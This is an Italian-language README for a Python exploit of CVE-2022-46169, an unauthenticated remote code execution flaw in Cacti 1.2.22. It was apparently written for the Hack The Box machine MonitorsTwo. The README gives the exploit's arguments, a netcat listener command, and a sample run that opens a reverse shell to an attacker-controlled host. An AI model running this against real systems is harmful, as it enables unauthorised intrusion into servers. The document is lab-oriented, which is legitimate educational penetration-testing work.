
Exploit Python per CVE-2022-46169 che fornisce l'esecuzione remota di codice non autenticata su Cacti 1.2.22 tramite reverse shell, destinato a test di penetrazione educativi.
Questo repository contiene un exploit per CVE-2022-46169, che colpisce Cacti 1.2.22. Questa vulnerabilità consente a un attaccante non autenticato di eseguire codice arbitrario sul sistema interessato.
Se desideri una descrizione dettagliata di come questo exploit è possibile, consulta questo articolo di Rapid7. Entrano in grandi dettagli sulle specifiche.
Ho scritto questo codice, con l'aiuto di chatGPT per una macchina Hack The Box chiamata MonitorsTwo a scopo educativo.
Arguments:
-u URL of Cacti Application
-lhost IP address of machine you want the shell on
-lport Port of the machine you want the shell on
Configura un listener sulla tua macchina locale con netcat nc -lvnp 9001
Esegui l'exploit contro il target
python3 CVE-2022-46169.py -url http://10.10.11.211/ -lhost 10.10.14.3 -lport 9001
Questo Proof of Concept (PoC) è inteso rigorosamente a scopo educativo e di test. Utilizzare questo PoC su qualsiasi sistema o rete senza la chiara autorizzazione del proprietario del sistema è illegale e potrebbe portare ad azioni legali. Il creatore non si assume alcuna responsabilità per eventuali danni derivanti dall'applicazione corretta o scorretta di questo PoC. Usalo a tuo rischio.
https://www.rapid7.com/db/vulnerabilities/debian-cve-2022-46169/